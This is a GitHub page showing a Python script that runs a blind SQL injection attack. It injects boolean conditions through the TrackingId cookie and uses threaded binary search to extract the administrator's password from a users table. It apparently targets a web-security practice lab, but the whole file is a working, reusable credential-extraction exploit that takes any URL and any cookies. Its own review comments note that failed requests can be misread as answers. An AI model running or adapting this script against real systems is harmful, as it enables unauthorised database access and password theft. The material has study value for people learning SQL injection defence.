-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathbinarySearch.py
More file actions
226 lines (198 loc) · 7.62 KB
/
binarySearch.py
File metadata and controls
226 lines (198 loc) · 7.62 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
import requests
import threading
import sys
import readline
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
# ─── Constants ────────────────────────────────────────────
MAX_WORKERS = 20  # Parallel threads (worker count passed to ThreadPoolExecutor in main)
MAX_RETRIES = 3  # Retry failed requests: total attempts send_request makes per probe
TIMEOUT = 10  # Request timeout seconds (passed as timeout= to every HTTP GET)
PASSWORD_LEN = 20  # Password length: number of 1-based positions that get probed
ASCII_LOW = 32  # Printable ASCII start (space); initial lower search bound
ASCII_HIGH = 126  # Printable ASCII end ('~'); initial upper search bound
# ─── Shared State ─────────────────────────────────────────
# One slot per position; '?' marks a position that has not been recovered.
password = ['?'] * PASSWORD_LEN
# Held by workers while they update `password` / `found_count` and print.
lock = threading.Lock()
# Number of positions recovered so far; incremented by binary_search_char.
found_count = 0
def get_input(prompt):
    """Show *prompt* and return the line the user typed.

    The file imports ``readline`` at module level, which is what gives
    ``input()`` line-editing support on platforms where it is available.

    Returns:
        The entered text, or an empty string when the input stream is
        exhausted (``EOFError``).
    """
    try:
        typed = input(prompt)
    except EOFError:
        # End of input is reported to callers as "nothing entered".
        typed = ''
    return typed
def fix_url(url):
    """Normalize a user-supplied address into a URL with scheme and trailing slash.

    Surrounding whitespace is stripped, ``https://`` is prepended when the
    value does not already start with an http/https scheme, and a trailing
    ``/`` is appended when missing.

    Args:
        url: Raw text entered by the user.

    Returns:
        The normalized URL string.
    """
    url = url.strip()
    # URI schemes are case-insensitive, so "HTTPS://host" already has a
    # scheme and must not get a second one prepended.
    if not url.lower().startswith(("http://", "https://")):
        url = "https://" + url
    if not url.endswith('/'):
        url += '/'
    return url
def validate_url(url):
    """Run basic sanity checks on a URL string typed by the user.

    Checks, in order: non-empty, no space characters, contains a dot.

    Returns:
        ``(True, "")`` when every check passes, otherwise
        ``(False, message)`` with the message of the first failed check.
    """
    if not url:
        problem = "URL cannot be empty!"
    elif ' ' in url:
        problem = "URL cannot contain spaces!"
    elif '.' not in url:
        problem = "Invalid URL format! (e.g. abc123.example.net)"
    else:
        problem = ""
    # An empty problem string means the value passed every check.
    return (not problem), problem
def validate_cookie(value, name):
    """Check that a cookie value is non-empty and contains no spaces.

    Args:
        value: The cookie value entered by the user.
        name: Label used in the error message (e.g. ``"TrackingId"``).

    Returns:
        ``(True, "")`` when acceptable, otherwise ``(False, message)``.
    """
    if value:
        if ' ' in value:
            return False, f"{name} cannot contain spaces!"
        return True, ""
    return False, f"{name} cannot be empty!"
def get_valid_input(prompt, validate_func, *args):
    """Prompt repeatedly until the validator accepts the entered value.

    Args:
        prompt: Text shown to the user on every attempt.
        validate_func: Callable invoked as ``validate_func(value, *args)``
            that returns an ``(is_valid, error_message)`` pair.
        *args: Extra positional arguments forwarded to ``validate_func``.

    Returns:
        The first whitespace-stripped value that validates.
    """
    # NOTE(review): get_input returns '' on EOF, so with a validator that
    # rejects empty input this loop never ends once stdin is exhausted.
    while True:
        candidate = get_input(prompt).strip()
        accepted, complaint = validate_func(candidate, *args)
        if not accepted:
            print(f" [!] {complaint} Please try again.")
            continue
        return candidate
def test_connection(url):
    """Probe *url* with a single GET and report whether it is reachable.

    Returns:
        ``(True, status_code)`` when a response was received, otherwise
        ``(False, reason)`` where ``reason`` is a short explanation.
    """
    # Checked in this order; the first matching type supplies the message.
    known_failures = (
        (requests.exceptions.ConnectionError, "Cannot connect - check URL"),
        (requests.exceptions.Timeout, "Connection timed out"),
        (requests.exceptions.InvalidURL, "Invalid URL format"),
    )
    try:
        response = requests.get(url, timeout=TIMEOUT)
        return True, response.status_code
    except Exception as exc:
        for failure_type, reason in known_failures:
            if isinstance(exc, failure_type):
                return False, reason
        # Anything unrecognized is reported using its own text.
        return False, str(exc)
def send_request(session_obj, url, base_tracking_id, session_cookie, pos, operator, value):
    """Send one boolean probe and report whether the page contains "Welcome".

    The ``TrackingId`` cookie is ``base_tracking_id`` followed by a
    condition comparing the ASCII code of the character at 1-based ``pos``
    of the ``administrator`` password against ``value`` using ``operator``.

    Args:
        session_obj: Object exposing ``get(url, cookies=..., timeout=...)``.
        url: Address to request.
        base_tracking_id: Original ``TrackingId`` cookie value.
        session_cookie: Value sent as the ``session`` cookie.
        pos: 1-based character position being probed.
        operator: Comparison operator text placed into the condition.
        value: Number the character code is compared against.

    Returns:
        ``True`` when the response text contains ``"Welcome"``; ``False``
        when it does not, or when every attempt raised.
    """
    # NOTE(review): a request that fails on all attempts is indistinguishable
    # from a probe whose condition was false - both yield False.
    condition = (
        f"(SELECT+ASCII(SUBSTRING(password,{pos},1))+FROM+users+"
        f"WHERE+username='administrator'){operator}{value}"
    )
    jar = {
        "TrackingId": f"{base_tracking_id}'+AND+{condition}--",
        "session": session_cookie,
    }
    final_attempt = MAX_RETRIES - 1
    for attempt in range(MAX_RETRIES):
        try:
            response = session_obj.get(url, cookies=jar, timeout=TIMEOUT)
            return "Welcome" in response.text
        except requests.exceptions.Timeout:
            # Wait longer after each timed-out attempt.
            pause = 0.5 * (attempt + 1)
        except Exception:
            pause = 0.3
        if attempt >= final_attempt:
            return False
        time.sleep(pause)
    return False
def binary_search_char(session_obj, url, base_tracking_id, session_cookie, pos):
    """Recover the character at 1-based ``pos`` by bisecting the code range.

    The search runs between ``ASCII_LOW`` and ``ASCII_HIGH``. Each step asks
    ``send_request`` whether the character code is greater than the
    midpoint and, if not, whether it is smaller; when neither holds the
    midpoint is taken as the answer. On success the character is stored in
    the shared ``password`` list and ``found_count`` is incremented.

    Returns:
        ``(pos, char)`` on success, or ``(pos, None)`` when the range is
        exhausted without a match.
    """
    # NOTE(review): send_request also returns False when a request fails, so
    # two failed probes in one step are read as an exact match.
    global found_count
    lo, hi = ASCII_LOW, ASCII_HIGH
    while lo <= hi:
        guess = (lo + hi) // 2
        if send_request(session_obj, url, base_tracking_id, session_cookie, pos, ">", guess):
            lo = guess + 1
            continue
        if send_request(session_obj, url, base_tracking_id, session_cookie, pos, "<", guess):
            hi = guess - 1
            continue
        # Neither greater nor smaller: the midpoint is the character code.
        recovered = chr(guess)
        with lock:
            password[pos - 1] = recovered
            found_count += 1
            progress = f"{found_count}/{PASSWORD_LEN}"
            print(f"[+] Position {pos:02d}: '{recovered}' | Progress: {progress} | {''.join(password)}")
        return pos, recovered
    # Range exhausted without a match.
    with lock:
        print(f"[-] Position {pos:02d}: not found")
    return pos, None
def check_session_valid(session_obj, url, base_tracking_id, session_cookie):
    """Quick best-effort check that the supplied cookies are still accepted.

    Sends one GET with the unmodified cookies and inspects the final URL
    of the response.

    Args:
        session_obj: Object exposing ``get(url, cookies=..., timeout=...)``.
        url: Address to request.
        base_tracking_id: Value sent as the ``TrackingId`` cookie.
        session_cookie: Value sent as the ``session`` cookie.

    Returns:
        ``False`` when the final URL contains ``"login"`` (case-insensitive)
        or the request raised an ordinary exception; ``True`` otherwise.

    Raises:
        KeyboardInterrupt, SystemExit: Propagated unchanged so that Ctrl-C
            during the check still interrupts the program.
    """
    try:
        response = session_obj.get(
            url,
            cookies={
                "TrackingId": base_tracking_id,
                "session": session_cookie,
            },
            timeout=TIMEOUT,
        )
        # If we get redirected to login, session expired
        return "login" not in response.url.lower()
    except Exception:
        # Any ordinary failure counts as "not valid". Deliberately not a
        # bare except: that would also swallow KeyboardInterrupt/SystemExit.
        return False
def main():
    """Interactive entry point: collect inputs, run the workers, print the result.

    Steps, in order:
      1. Prompt for a URL until ``test_connection`` succeeds.
      2. Prompt for the ``TrackingId`` and ``session`` cookie values.
      3. Check the cookies with ``check_session_valid`` (a failure only
         prints a warning; the run continues).
      4. Reset the shared ``password`` / ``found_count`` state and submit
         one ``binary_search_char`` task per position to a thread pool.
      5. Print the assembled password and the elapsed time.

    A ``KeyboardInterrupt`` anywhere inside the ``try`` prints the partial
    password and exits the process with status 0.
    """
    global found_count, password
    print("=" * 55)
    print(" Blind SQLi - Binary Search Attack")
    print("=" * 55)
    print()
    try:
        # ── Get and validate URL ──
        while True:
            url = get_valid_input("[*] URL : ", validate_url)
            url = fix_url(url)
            print("[*] Testing connection...")
            ok, result = test_connection(url)
            if ok:
                # On success `result` is the HTTP status code.
                print(f"[+] Connected! Status: {result}\n")
                break
            else:
                # On failure `result` is a human-readable reason.
                print(f" [!] {result}")
                print(" [!] Please enter a valid URL.\n")
        # ── Get cookies ──
        tracking_id = get_valid_input("[*] TrackingId : ", validate_cookie, "TrackingId")
        session = get_valid_input("[*] Session : ", validate_cookie, "Session")
        # ── Validate session before starting ──
        print("\n[*] Validating cookies...")
        # NOTE(review): this one Session object is shared by every worker
        # thread below and is never explicitly closed.
        http_session = requests.Session()  # Reuse TCP connections = faster
        if not check_session_valid(http_session, url, tracking_id, session):
            print("[!] Warning: Session may be expired - results could be wrong!")
        else:
            print("[+] Cookies OK!\n")
        print(f"[*] Target : {url}")
        print(f"[*] Threads : {MAX_WORKERS}")
        print(f"[*] Retries : {MAX_RETRIES} per request")
        print(f"[*] Starting attack...\n")
        # Reset state (rebinds the module-level names declared `global` above)
        password = ['?'] * PASSWORD_LEN
        found_count = 0
        start_time = time.time()
        # ── ThreadPoolExecutor - more efficient than manual threads ──
        with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
            # Map each future back to its 1-based position for error reporting.
            futures = {
                executor.submit(
                    binary_search_char,
                    http_session, url, tracking_id, session, pos
                ): pos
                for pos in range(1, PASSWORD_LEN + 1)
            }
            # Process results as they complete
            for future in as_completed(futures):
                try:
                    # The return value is ignored; workers write into the
                    # shared `password` list themselves. Calling result()
                    # re-raises any exception from the worker.
                    future.result()
                except Exception as e:
                    pos = futures[future]
                    print(f"[-] Position {pos:02d} error: {e}")
        elapsed = time.time() - start_time
        # ── Final result ──
        print("\n" + "=" * 55)
        # Any slot still holding '?' was never filled in by a worker.
        if '?' in password:
            print("[!] Warning: Some positions failed!")
            print("[!] Try again with fresh cookies.")
        print(f"[*] Final Password : {''.join(password)}")
        print(f"[*] Time Taken : {elapsed:.2f} seconds")
        print("=" * 55)
    except KeyboardInterrupt:
        print("\n\n[-] Interrupted by user.")
        print(f"[*] Partial Password: {''.join(password)}")
        sys.exit(0)
# Run the interactive tool only when this file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()